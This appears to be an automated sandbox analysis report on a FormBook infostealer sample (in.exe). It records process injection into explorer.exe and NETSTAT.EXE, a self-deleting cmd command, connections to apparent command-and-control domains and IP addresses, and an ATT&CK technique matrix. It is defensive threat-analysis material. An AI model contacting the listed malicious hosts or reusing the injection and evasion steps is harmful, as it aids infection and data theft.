Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03892D8A mov eax, dword ptr fs:[00000030h]	8_2_03892D8A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03892D8A mov eax, dword ptr fs:[00000030h]	8_2_03892D8A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03892D8A mov eax, dword ptr fs:[00000030h]	8_2_03892D8A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03892D8A mov eax, dword ptr fs:[00000030h]	8_2_03892D8A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03892D8A mov eax, dword ptr fs:[00000030h]	8_2_03892D8A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038CA185 mov eax, dword ptr fs:[00000030h]	8_2_038CA185
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038BC182 mov eax, dword ptr fs:[00000030h]	8_2_038BC182
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038C35A1 mov eax, dword ptr fs:[00000030h]	8_2_038C35A1
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03948DF1 mov eax, dword ptr fs:[00000030h]	8_2_03948DF1
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0389B1E1 mov eax, dword ptr fs:[00000030h]	8_2_0389B1E1
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0389B1E1 mov eax, dword ptr fs:[00000030h]	8_2_0389B1E1
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0389B1E1 mov eax, dword ptr fs:[00000030h]	8_2_0389B1E1
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03899100 mov eax, dword ptr fs:[00000030h]	8_2_03899100
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03899100 mov eax, dword ptr fs:[00000030h]	8_2_03899100
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03899100 mov eax, dword ptr fs:[00000030h]	8_2_03899100
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03968D34 mov eax, dword ptr fs:[00000030h]	8_2_03968D34
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038B4120 mov eax, dword ptr fs:[00000030h]	8_2_038B4120
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038B4120 mov eax, dword ptr fs:[00000030h]	8_2_038B4120
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038B4120 mov eax, dword ptr fs:[00000030h]	8_2_038B4120
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038B4120 mov eax, dword ptr fs:[00000030h]	8_2_038B4120
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038B4120 mov ecx, dword ptr fs:[00000030h]	8_2_038B4120
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038C513A mov eax, dword ptr fs:[00000030h]	8_2_038C513A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038C513A mov eax, dword ptr fs:[00000030h]	8_2_038C513A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038C4D3B mov eax, dword ptr fs:[00000030h]	8_2_038C4D3B
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038C4D3B mov eax, dword ptr fs:[00000030h]	8_2_038C4D3B
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038C4D3B mov eax, dword ptr fs:[00000030h]	8_2_038C4D3B
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0389AD30 mov eax, dword ptr fs:[00000030h]	8_2_0389AD30
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038D3D43 mov eax, dword ptr fs:[00000030h]	8_2_038D3D43
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038BB944 mov eax, dword ptr fs:[00000030h]	8_2_038BB944
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038BB944 mov eax, dword ptr fs:[00000030h]	8_2_038BB944
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03913540 mov eax, dword ptr fs:[00000030h]	8_2_03913540
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038B7D50 mov eax, dword ptr fs:[00000030h]	8_2_038B7D50
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0389B171 mov eax, dword ptr fs:[00000030h]	8_2_0389B171
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0389B171 mov eax, dword ptr fs:[00000030h]	8_2_0389B171
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038BC577 mov eax, dword ptr fs:[00000030h]	8_2_038BC577
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038BC577 mov eax, dword ptr fs:[00000030h]	8_2_038BC577
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03899080 mov eax, dword ptr fs:[00000030h]	8_2_03899080
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03913884 mov eax, dword ptr fs:[00000030h]	8_2_03913884
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03913884 mov eax, dword ptr fs:[00000030h]	8_2_03913884
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038D90AF mov eax, dword ptr fs:[00000030h]	8_2_038D90AF
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038CF0BF mov ecx, dword ptr fs:[00000030h]	8_2_038CF0BF
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038CF0BF mov eax, dword ptr fs:[00000030h]	8_2_038CF0BF
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038CF0BF mov eax, dword ptr fs:[00000030h]	8_2_038CF0BF
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03968CD6 mov eax, dword ptr fs:[00000030h]	8_2_03968CD6
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0392B8D0 mov eax, dword ptr fs:[00000030h]	8_2_0392B8D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0392B8D0 mov ecx, dword ptr fs:[00000030h]	8_2_0392B8D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0392B8D0 mov eax, dword ptr fs:[00000030h]	8_2_0392B8D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0392B8D0 mov eax, dword ptr fs:[00000030h]	8_2_0392B8D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0392B8D0 mov eax, dword ptr fs:[00000030h]	8_2_0392B8D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0392B8D0 mov eax, dword ptr fs:[00000030h]	8_2_0392B8D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_039514FB mov eax, dword ptr fs:[00000030h]	8_2_039514FB
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03964015 mov eax, dword ptr fs:[00000030h]	8_2_03964015
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03964015 mov eax, dword ptr fs:[00000030h]	8_2_03964015
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03917016 mov eax, dword ptr fs:[00000030h]	8_2_03917016
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03917016 mov eax, dword ptr fs:[00000030h]	8_2_03917016
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03917016 mov eax, dword ptr fs:[00000030h]	8_2_03917016
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03951C06 mov eax, dword ptr fs:[00000030h]	8_2_03951C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03951C06 mov eax, dword ptr fs:[00000030h]	8_2_03951C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03951C06 mov eax, dword ptr fs:[00000030h]	8_2_03951C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03951C06 mov eax, dword ptr fs:[00000030h]	8_2_03951C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03951C06 mov eax, dword ptr fs:[00000030h]	8_2_03951C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03951C06 mov eax, dword ptr fs:[00000030h]	8_2_03951C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03951C06 mov eax, dword ptr fs:[00000030h]	8_2_03951C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03951C06 mov eax, dword ptr fs:[00000030h]	8_2_03951C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03951C06 mov eax, dword ptr fs:[00000030h]	8_2_03951C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03951C06 mov eax, dword ptr fs:[00000030h]	8_2_03951C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03951C06 mov eax, dword ptr fs:[00000030h]	8_2_03951C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03951C06 mov eax, dword ptr fs:[00000030h]	8_2_03951C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03951C06 mov eax, dword ptr fs:[00000030h]	8_2_03951C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03951C06 mov eax, dword ptr fs:[00000030h]	8_2_03951C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0396740D mov eax, dword ptr fs:[00000030h]	8_2_0396740D
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0396740D mov eax, dword ptr fs:[00000030h]	8_2_0396740D
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0396740D mov eax, dword ptr fs:[00000030h]	8_2_0396740D
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038AB02A mov eax, dword ptr fs:[00000030h]	8_2_038AB02A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038AB02A mov eax, dword ptr fs:[00000030h]	8_2_038AB02A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038AB02A mov eax, dword ptr fs:[00000030h]	8_2_038AB02A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038AB02A mov eax, dword ptr fs:[00000030h]	8_2_038AB02A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038CBC2C mov eax, dword ptr fs:[00000030h]	8_2_038CBC2C
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0392C450 mov eax, dword ptr fs:[00000030h]	8_2_0392C450
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0392C450 mov eax, dword ptr fs:[00000030h]	8_2_0392C450
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03961074 mov eax, dword ptr fs:[00000030h]	8_2_03961074
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03952073 mov eax, dword ptr fs:[00000030h]	8_2_03952073
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038B746D mov eax, dword ptr fs:[00000030h]	8_2_038B746D

Source: C:\Users\user\Desktop\in.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\in.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 162.241.244.112 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.holodov.net
Source: C:\Windows\explorer.exe	Network Connect: 52.128.23.153 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.leeindustrles.com
Source: C:\Windows\explorer.exe	Domain query: www.couttsagency.com
Source: C:\Windows\explorer.exe	Domain query: www.industry-automation.com
Source: C:\Windows\explorer.exe	Domain query: www.fashionblessings.com
Source: C:\Windows\explorer.exe	Domain query: www.hjtzzg.com
Source: C:\Windows\explorer.exe	Network Connect: 156.245.135.187 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.vedgc.com
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\in.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\in.exe	Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\in.exe	Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\in.exe	Thread register set: target process: 3472			Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Thread register set: target process: 3472			Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\in.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Source: C:\Users\user\Desktop\in.exe	Process created: C:\Users\user\Desktop\in.exe C:\Users\user\Desktop\in.exe			Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\in.exe'			Jump to behavior

Source: explorer.exe, 00000003.00000000.258095067.0000000005EA0000.00000004.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.504508932.0000000005E90000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000002.500633906.0000000001640000.00000002.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.504508932.0000000005E90000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000003.00000002.500633906.0000000001640000.00000002.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.504508932.0000000005E90000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000003.00000002.499751254.0000000001128000.00000004.00000020.sdmp	Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000003.00000002.500633906.0000000001640000.00000002.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.504508932.0000000005E90000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000003.00000002.500633906.0000000001640000.00000002.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.504508932.0000000005E90000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\in.exe	Queries volume information: C:\Users\user\Desktop\in.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\in.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\in.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\in.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\in.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\in.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\in.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000008.00000002.500616903.00000000034C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.285496471.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.285906705.0000000001100000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.498508989.0000000001020000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.241660849.00000000034E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.285926507.0000000001130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.500429696.0000000003490000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.in.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.in.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000008.00000002.500616903.00000000034C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.285496471.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.285906705.0000000001100000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.498508989.0000000001020000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.241660849.00000000034E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.285926507.0000000001130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.500429696.0000000003490000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.in.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.in.exe.400000.0.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection412	Masquerading1	OS Credential Dumping	Security Software Discovery221	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Disable or Modify Tools1	LSASS Memory	Process Discovery2	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion31	Security Account Manager	Virtualization/Sandbox Evasion31	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection412	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol12	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information1	LSA Secrets	System Network Configuration Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information4	Cached Domain Credentials	System Network Connections Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Software Packing3	DCSync	System Information Discovery112	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
in.exe	30%	Virustotal		Browse
in.exe	38%	Metadefender		Browse
in.exe	76%	ReversingLabs	ByteCode-MSIL.Trojan.Taskun
in.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
2.2.in.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
www.holodov.net/sjgd/	0%	Avira URL Cloud	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
couttsagency.com	162.241.244.112	true	true	unknown
www.hjtzzg.com	156.245.135.187	true	true	unknown
fashionblessings.com	34.102.136.180	true	false	unknown
www.hana-pet.com	107.151.118.90	true	false	unknown
wcieckashmir.com	78.142.63.38	true	true	unknown
www.industry-automation.com	52.128.23.153	true	true	unknown
www.holodov.net	unknown	unknown	true	unknown
www.fashionblessings.com	unknown	unknown	true	unknown
www.wcieckashmir.com	unknown	unknown	true	unknown
www.vedgc.com	unknown	unknown	true	unknown
www.leeindustrles.com	unknown	unknown	true	unknown
www.couttsagency.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
www.holodov.net/sjgd/	true	Avira URL Cloud: safe	low

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/LICENSE-2.0	explorer.exe, 00000003.00000000.270914396.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	explorer.exe, 00000003.00000000.270914396.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designersG	explorer.exe, 00000003.00000000.270914396.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	explorer.exe, 00000003.00000000.270914396.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	explorer.exe, 00000003.00000000.270914396.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	explorer.exe, 00000003.00000000.270914396.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.tiro.com	explorer.exe, 00000003.00000000.270914396.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 00000003.00000000.270914396.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.goodfont.co.kr	explorer.exe, 00000003.00000000.270914396.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css	in.exe, 00000000.00000002.241150874.0000000002536000.00000004.00000001.sdmp	false		high
http://www.carterandcone.coml	explorer.exe, 00000003.00000000.270914396.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sajatypeworks.com	explorer.exe, 00000003.00000000.270914396.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	explorer.exe, 00000003.00000000.270914396.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	explorer.exe, 00000003.00000000.270914396.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/cThe	explorer.exe, 00000003.00000000.270914396.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	explorer.exe, 00000003.00000000.270914396.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	explorer.exe, 00000003.00000000.270914396.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn	explorer.exe, 00000003.00000000.270914396.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	explorer.exe, 00000003.00000000.270914396.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/	explorer.exe, 00000003.00000000.270914396.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	explorer.exe, 00000003.00000000.270914396.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	explorer.exe, 00000003.00000000.270914396.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.fonts.com	explorer.exe, 00000003.00000000.270914396.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	explorer.exe, 00000003.00000000.270914396.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.urwpp.deDPlease	explorer.exe, 00000003.00000000.270914396.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	explorer.exe, 00000003.00000000.270914396.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	in.exe, 00000000.00000002.241089375.00000000024E1000.00000004.00000001.sdmp	false		high
